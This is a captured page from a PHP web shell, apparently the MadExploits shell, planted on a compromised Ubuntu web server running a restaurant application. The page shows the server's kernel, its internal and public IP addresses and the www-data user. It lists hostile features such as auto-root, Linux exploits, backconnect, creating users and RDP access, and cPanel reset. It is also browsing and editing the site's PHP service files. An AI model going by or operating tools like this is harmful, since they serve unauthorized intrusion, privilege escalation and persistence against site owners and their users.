Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.224.33.235
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
restaurants /
src /
Service /
[ HOME SHELL ]
Name
Size
Permission
Action
EmailSender.php
624
B
-rw-rw-r--
FileUploader.php
1.48
KB
-rw-rw-r--
MailgunTransport.php
816
B
-rw-rw-r--
PaystackHelper.php
2.53
KB
-rw-rw-r--
RegisterActivity.php
1.18
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : EmailSender.php
<?php namespace App\Service; class EmailSender { /** * @var Mailgun */ private $mailgun; private $templating; public function __construct(MailgunTransport $mailgun, \Twig\Environment $templating) { $this->mailgun = $mailgun; $this->templating = $templating; } public function sendPlainEmail($view, $email, $subject, $text) { $message = $this->templating->render( $view, [ 'text' => $text ] ); $response = $this->mailgun->send($email, $subject, $message); return $response; } }
Close